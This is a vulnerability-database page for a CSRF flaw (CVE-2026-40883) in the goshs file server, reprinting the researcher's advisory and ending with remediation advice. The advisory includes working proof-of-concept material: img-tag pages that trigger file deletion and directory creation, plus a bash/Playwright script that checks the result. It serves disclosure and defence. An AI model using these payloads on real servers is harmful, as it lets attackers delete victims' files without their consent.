Skip to main content

Node.js CVE-2026-40883

MEDIUM
Cross-Site Request Forgery (CSRF) (CWE-352)
2026-04-14 https://github.com/patrickhener/goshs GHSA-jrq5-hg6x-j6g3
6.1
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
SUSE
8.1 HIGH
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
CVSS changed
Apr 21, 2026 - 20:22 NVD
6.1 (MEDIUM)
Patch released
Apr 16, 2026 - 02:30 nvd
Patch available
CVE Published
Apr 14, 2026 - 22:28 nvd
MEDIUM 6.1

DescriptionGitHub Advisory

Summary

goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as ?delete and ?mkdir because goshs relies on HTTP basic auth alone and performs no CSRF, Origin, or Referer validation for those routes. I reproduced this on v2.0.0-beta.5.

Details

The vulnerable request handling is reachable through normal GET requests:

  • httpserver/handler.go:118-123 dispatches ?mkdir directly to handleMkdir()
  • httpserver/handler.go:180-186 dispatches ?delete directly to deleteFile()

Authentication is enforced only by HTTP basic auth:

  • httpserver/middleware.go:20-87 accepts any request that presents valid cached or replayed basic-auth credentials

The resulting state changes hit filesystem mutation sinks:

  • httpserver/handler.go:683-718 calls os.RemoveAll() in deleteFile()
  • httpserver/handler.go:961-1000 calls os.MkdirAll() in handleMkdir()

Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed:

  • <img src="http://127.0.0.1:18095/victim.txt?delete">
  • <img src="http://127.0.0.1:18095/csrfmade?mkdir">

If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem.

PoC

Manual verification commands used:

Terminal 1

bash
cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
go build -o /tmp/goshs_beta5 ./

rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site
mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site
printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt

cat > /tmp/goshs_csrf_site/delete.html <<'HTML'
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:18095/victim.txt?delete">
  </body>
</html>
HTML

cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML'
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:18095/csrfmade?mkdir">
  </body>
</html>
HTML

/tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p'

Terminal 2

bash
python3 -m http.server 18889 --directory /tmp/goshs_csrf_site

Victim actions:

  1. Open http://127.0.0.1:18095/ in a browser and authenticate with u:p.
  2. Visit http://127.0.0.1:18889/delete.html.
  3. Visit http://127.0.0.1:18889/mkdir.html.

Two terminal commands I ran during local validation:

bash
test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED
test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING

Expected result:

  • the first check prints DELETED
  • the second check prints CREATED

PoC Video 1:

https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473

Single-script verification:

bash
'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3'

Observed script result:

  • Delete status: DELETED
  • mkdir status: CREATED
  • [RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET

PoC Video 2:

https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede

gosh_poc3 script content:

bash
#!/usr/bin/env bash
set -euo pipefail

REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
PLAY_DIR='/tmp/codex-playwright'
BIN='/tmp/goshs_beta5_csrf'
PORT='18095'
ATTACKER_PORT='18889'
CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)"
ROOT="$WORKDIR/root"
SITE="$WORKDIR/site"
GOSHS_PID=""
ATTACKER_PID=""

cleanup() {
  if [[ -n "${ATTACKER_PID:-}" ]]; then
    kill "${ATTACKER_PID}" >/dev/null 2>&1 || true
  fi
  if [[ -n "${GOSHS_PID:-}" ]]; then
    kill "${GOSHS_PID}" >/dev/null 2>&1 || true
  fi
}
trap cleanup EXIT

mkdir -p "$ROOT" "$SITE"
printf 'delete me\n' > "$ROOT/victim.txt"

cat > "$SITE/delete.html" <<HTML
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:${PORT}/victim.txt?delete">
  </body>
</html>
HTML

cat > "$SITE/mkdir.html" <<HTML
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir">
  </body>
</html>
HTML

echo "[1/6] Building goshs beta.5"
(cd "$REPO" && go build -o "$BIN" ./)

echo "[2/6] Starting goshs with HTTP basic auth"
"$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 &
GOSHS_PID=$!

for _ in $(seq 1 40); do
  if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then
    break
  fi
  sleep 0.25
done

echo "[3/6] Serving attacker pages"
python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 &
ATTACKER_PID=$!

if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then
  mkdir -p "$PLAY_DIR"
  (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null)
fi

if [[ ! -x "$CHROME" ]]; then
  echo "[ERROR] Chrome not found at $CHROME" >&2
  exit 1
fi

echo "[4/6] Visiting attacker pages from an authenticated browser"
node - <<'NODE'
const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core');

(async () => {
  const browser = await chromium.launch({
    headless: true,
    executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome',
  });
  const context = await browser.newContext({
    httpCredentials: { username: 'u', password: 'p' },
  });
  const page = await context.newPage();
  await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' });
  await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' });
  await page.waitForTimeout(1200);
  await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' });
  await page.waitForTimeout(1200);
  await browser.close();
})();
NODE

echo "[5/6] Verifying impact"
DELETE_STATUS="MISSING"
MKDIR_STATUS="MISSING"
if [[ ! -e "$ROOT/victim.txt" ]]; then
  DELETE_STATUS="DELETED"
fi
if [[ -d "$ROOT/csrfmade" ]]; then
  MKDIR_STATUS="CREATED"
fi

echo "[6/6] Results"
echo "Delete status: $DELETE_STATUS"
echo "mkdir status: $MKDIR_STATUS"

if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then
  echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET'
else
  echo '[RESULT] NOT REPRODUCED'
  exit 1
fi

Impact

This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated.

Remediation

Suggested fixes:

  1. Move all state-changing functionality such as delete and mkdir off GET routes and require non-idempotent methods such as POST or DELETE.
  2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict Origin and Referer validation.
  3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.

Analysis

Summary

goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as ?delete and ?mkdir because goshs relies on HTTP basic auth alone and performs no CSRF, Origin, or Referer validation for those routes. I reproduced this on v2.0.0-beta.5.

Details

The vulnerable request handling is reachable through normal GET requests:

  • httpserver/handler.go:118-123 dispatches ?mkdir directly to handleMkdir()
  • httpserver/handler.go:180-186 dispatches ?delete directly to deleteFile()

Authentication is enforced only by HTTP basic auth:

  • httpserver/middleware.go:20-87 accepts any request that presents valid cached or replayed basic-auth credentials

The resulting state changes hit filesystem mutation sinks:

  • httpserver/handler.go:683-718 calls os.RemoveAll() in deleteFile()
  • httpserver/handler.go:961-1000 calls os.MkdirAll() in handleMkdir()

Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed:

  • <img src="http://127.0.0.1:18095/victim.txt?delete">
  • <img src="http://127.0.0.1:18095/csrfmade?mkdir">

If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem.

PoC

Manual verification commands used:

Terminal 1

bash
cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
go build -o /tmp/goshs_beta5 ./

rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site
mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site
printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt

cat > /tmp/goshs_csrf_site/delete.html <<'HTML'
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:18095/victim.txt?delete">
  </body>
</html>
HTML

cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML'
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:18095/csrfmade?mkdir">
  </body>
</html>
HTML

/tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p'

Terminal 2

bash
python3 -m http.server 18889 --directory /tmp/goshs_csrf_site

Victim actions:

  1. Open http://127.0.0.1:18095/ in a browser and authenticate with u:p.
  2. Visit http://127.0.0.1:18889/delete.html.
  3. Visit http://127.0.0.1:18889/mkdir.html.

Two terminal commands I ran during local validation:

bash
test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED
test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING

Expected result:

  • the first check prints DELETED
  • the second check prints CREATED

PoC Video 1:

https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473

Single-script verification:

bash
'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3'

Observed script result:

  • Delete status: DELETED
  • mkdir status: CREATED
  • [RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET

PoC Video 2:

https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede

gosh_poc3 script content:

bash
#!/usr/bin/env bash
set -euo pipefail

REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
PLAY_DIR='/tmp/codex-playwright'
BIN='/tmp/goshs_beta5_csrf'
PORT='18095'
ATTACKER_PORT='18889'
CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)"
ROOT="$WORKDIR/root"
SITE="$WORKDIR/site"
GOSHS_PID=""
ATTACKER_PID=""

cleanup() {
  if [[ -n "${ATTACKER_PID:-}" ]]; then
    kill "${ATTACKER_PID}" >/dev/null 2>&1 || true
  fi
  if [[ -n "${GOSHS_PID:-}" ]]; then
    kill "${GOSHS_PID}" >/dev/null 2>&1 || true
  fi
}
trap cleanup EXIT

mkdir -p "$ROOT" "$SITE"
printf 'delete me\n' > "$ROOT/victim.txt"

cat > "$SITE/delete.html" <<HTML
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:${PORT}/victim.txt?delete">
  </body>
</html>
HTML

cat > "$SITE/mkdir.html" <<HTML
<!doctype html>
<html>
  <body>
    <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir">
  </body>
</html>
HTML

echo "[1/6] Building goshs beta.5"
(cd "$REPO" && go build -o "$BIN" ./)

echo "[2/6] Starting goshs with HTTP basic auth"
"$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 &
GOSHS_PID=$!

for _ in $(seq 1 40); do
  if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then
    break
  fi
  sleep 0.25
done

echo "[3/6] Serving attacker pages"
python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 &
ATTACKER_PID=$!

if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then
  mkdir -p "$PLAY_DIR"
  (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null)
fi

if [[ ! -x "$CHROME" ]]; then
  echo "[ERROR] Chrome not found at $CHROME" >&2
  exit 1
fi

echo "[4/6] Visiting attacker pages from an authenticated browser"
node - <<'NODE'
const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core');

(async () => {
  const browser = await chromium.launch({
    headless: true,
    executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome',
  });
  const context = await browser.newContext({
    httpCredentials: { username: 'u', password: 'p' },
  });
  const page = await context.newPage();
  await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' });
  await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' });
  await page.waitForTimeout(1200);
  await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' });
  await page.waitForTimeout(1200);
  await browser.close();
})();
NODE

echo "[5/6] Verifying impact"
DELETE_STATUS="MISSING"
MKDIR_STATUS="MISSING"
if [[ ! -e "$ROOT/victim.txt" ]]; then
  DELETE_STATUS="DELETED"
fi
if [[ -d "$ROOT/csrfmade" ]]; then
  MKDIR_STATUS="CREATED"
fi

echo "[6/6] Results"
echo "Delete status: $DELETE_STATUS"
echo "mkdir status: $MKDIR_STATUS"

if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then
  echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET'
else
  echo '[RESULT] NOT REPRODUCED'
  exit 1
fi

Impact

This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated.

Remediation

Suggested fixes:

  1. Move all state-changing functionality such as delete and mkdir off GET routes and require non-idempotent methods such as POST or DELETE.
  2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict Origin and Referer validation.
  3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Vendor StatusVendor

SUSE

Severity: High

Share

CVE-2026-40883 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy